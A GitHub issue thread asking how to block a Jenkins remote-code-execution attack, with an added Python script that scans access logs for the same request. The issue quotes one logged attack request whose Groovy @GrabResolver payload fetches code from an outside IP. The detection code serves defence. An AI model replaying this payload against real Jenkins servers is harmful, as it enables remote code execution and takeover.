petercunha/jenkins-rce

Need help: How to prevent the attack

Closed this issue · 1 comments

p00j4 commented

Observing the attack, apart from blocking the IP, what more can be done to prevent any similar attacks in the future? I'm not using `workflow-cps-plugin`, so I'm wondering how this attack is reaching:

"GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name='FLSOA',root='http://107.170.26.148/')%0a@Grab(group='VSCYG',module='BNTJL',version='1')%0aimport%20KJNME; HTTP/1.1" 499 0 "-" "python-requests/2.18.4"

To prevent the attack, update to the latest version of Jenkins. They have patched the securityRealm bypass in their latest release.
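
One way to look for the request pattern quoted in this issue in web-server access logs, as an added example (not code from this repository or from either commenter). It assumes combined-format log lines; the function names and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Access-log line in combined format: ip ... "METHOD target HTTP/x.y" status ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>.+) HTTP/[\d.]+" (?P<status>\d{3}) ')
GRAB_RE = re.compile(r'@Gra(?:b\w*|pes)\b')              # @Grab, @GrabResolver, @GrabConfig, @Grapes
ROOT_RE = re.compile(r"root\s*=\s*['\"]([^'\"]+)['\"]")  # repository URL named by @GrabResolver

def inspect(line):
    """Return a finding for a checkScriptCompile request carrying Grape annotations, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    if "/descriptorByName/" not in url.path or not url.path.endswith("/checkScriptCompile"):
        return None
    script = "\n".join(parse_qs(url.query).get("value", []))  # percent-decoded Groovy source
    if not GRAB_RE.search(script):
        return None
    return {
        "ip": m["ip"],
        "status": int(m["status"]),
        "via_security_realm": url.path.startswith("/securityRealm/"),
        "resolver_roots": ROOT_RE.findall(script),
    }

def scan(lines):
    """Inspect every line and keep only the findings."""
    return [f for f in map(inspect, lines) if f]

# Constructed sample lines (documentation addresses and an .invalid host, not real traffic).
CPS = "descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile"
SAMPLE = [
    '203.0.113.7 - - [01/Jan/2019:00:00:01 +0000] "GET /securityRealm/user/admin/' + CPS +
    '?value=@GrabResolver(name=%27x%27,root=%27http://repo.example.invalid/%27)%0a'
    '@Grab(group=%27g%27,module=%27m%27,version=%271%27)%0aimport%20X; HTTP/1.1" 499 0 '
    '"-" "python-requests/2.18.4"',
    '198.51.100.4 - - [01/Jan/2019:00:00:02 +0000] "GET /job/demo/lastBuild/api/json HTTP/1.1" '
    '200 512 "-" "curl/7.58.0"',
    '198.51.100.9 - - [01/Jan/2019:00:00:03 +0000] "GET /job/demo/' + CPS +
    '?value=println(1) HTTP/1.1" 200 64 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

The `status` field shows how the server answered each matching request, and `resolver_roots` lists the hosts named in `@GrabResolver`, which can be checked against outbound proxy or DNS logs.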